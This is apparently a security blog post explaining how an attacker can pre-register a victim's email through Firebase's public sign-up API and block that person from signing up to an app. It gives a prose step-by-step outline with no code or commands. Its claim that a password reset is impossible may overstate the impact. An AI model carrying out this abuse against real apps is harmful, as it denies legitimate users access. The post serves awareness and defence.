How a Simple Firebase Misuse Can Lock Out Users From Signing Up
In the world of user authentication, ensuring that email addresses are properly validated and managed is crucial. But what happens when an attacker can abuse a third-party authentication system to "reserve" someone else's email, effectively blocking the real owner from ever signing up?
That’s exactly what this post explores—how the misuse of Firebase’s email sign-up API can result in a denial-of-service condition for legitimate users.
Understanding the Problem
Firebase offers a convenient way for developers to handle user authentication through APIs. One of these endpoints allows apps to create user accounts simply by sending a valid email and password.
However, there's a catch.
Most Firebase-based apps require users to verify their email before completing registration. But what if the backend marks the email as already registered the moment that signUp API is called, regardless of whether it's verified?
Now imagine an attacker takes advantage of this behavior and preemptively registers someone else’s email address. That’s where things get interesting (and dangerous).
Step-by-Step Breakdown
Here’s a general outline of how the abuse works:
1. Identify an unregistered email — The attacker chooses an email that doesn’t yet exist in the target app’s system.
2. Use Firebase’s public sign-up API — The attacker sends a POST request to the Firebase sign-up endpoint using the victim’s email and a random password. No verification or email access is required.
3. App marks email as taken — The backend sees the email in Firebase and assumes it’s a registered user.
4. Victim tries to sign up — When the real user later tries to sign up using their own email, they get an error like “email already in use.”
5. They can’t log in either — Since they don’t know the attacker’s password and never verified their email, logging in or resetting the password becomes impossible.
Real-World Impact
This creates a permanent lockout scenario for the victim. They are effectively blocked from ever registering on the platform unless the developers intervene manually—something not scalable for apps with large user bases.
At scale, this technique could be used to:
Deny access to high-value users
Spam or troll sign-up systems
Create friction in user onboarding flows
While the attack doesn’t involve traditional exploits like XSS or SQL injection, its real-world consequence—blocking someone from using your service—is significant.
Final Thoughts
This vulnerability highlights how even well-documented third-party services like Firebase can be misused in subtle ways. Denial-of-service attacks don’t always involve floods of traffic—sometimes a single API call is enough to keep someone out for good.
Security isn’t just about preventing unauthorized access—it’s also about ensuring rightful access to the people who need it.